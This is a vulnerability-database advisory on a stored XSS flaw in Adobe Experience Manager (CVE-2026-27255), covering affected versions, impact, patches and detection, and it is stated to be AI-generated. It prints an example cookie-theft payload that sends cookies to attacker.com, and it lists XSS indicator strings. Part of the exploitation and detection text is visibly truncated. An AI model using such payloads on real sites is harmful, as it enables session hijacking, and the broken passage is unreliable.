
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-27255 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Experience Manager (AEM) that allows a low-privileged attacker to inject malicious scripts into vulnerable form fields. Affected versions include AEM 6.5.23 and earlier (standard installations), AEM 6.5 LTS and 6.5-SP1, and AEM Cloud Service versions prior to 2026.02.0. Adobe disclosed and patched this vulnerability on March 10–11, 2026, as part of security bulletin APSB26-24. It carries a CVSS v3.1 base score of 5.4 (Medium) (Adobe Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically of the stored (persistent) variant. A low-privileged, authenticated attacker can submit malicious JavaScript payloads into AEM form fields that are not properly sanitized before being stored and later rendered to other users. When a victim browses to a page containing the compromised field, the injected script executes in their browser within the AEM application's origin context. Exploitation requires user interaction (a victim visiting the affected page) and low-level privileges to write to the vulnerable form fields (Adobe Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users who visit pages containing the injected content, potentially leading to session hijacking, credential theft, account takeover, page defacement, or distribution of malware to end users. The vulnerability affects both confidentiality (low) and integrity (low) of data accessed through the AEM application, with no direct availability impact. Because AEM is commonly used as an enterprise content management platform, compromised sessions could expose sensitive organizational content or enable further lateral movement within authenticated user contexts (Adobe Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an event-handler-based variant.<script>, onerror=, javascript:, etc.) in field values; repeated access to the same content page by multiple distinct users shortly after a form submission.Adobe has released patches addressing this vulnerability: update AEM standard installations to version 6.5.24 or later, and update AEM Cloud Service to version 2026.02.0 or later. Organizations running AEM 6.5 LTS or 6.5-SP1 should apply the latest security patch available from Adobe's APSB26-24 bulletin. As interim mitigations, restrict write access to AEM form fields to trusted users only, and deploy Web Application Firewall (WAF) rules to detect and block common XSS payloads. Review recent form submissions and JCR content nodes for suspicious script content (Adobe Advisory).
The CIS (Center for Internet Security) published an advisory noting multiple vulnerabilities in Adobe products patched in the March 2026 update cycle, including this XSS issue, flagging the broader release as potentially allowing arbitrary code execution across the Adobe product suite (CIS Advisory). No significant independent researcher commentary, social media discussion, or media coverage specific to CVE-2026-27255 has been identified beyond standard vulnerability database aggregation.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."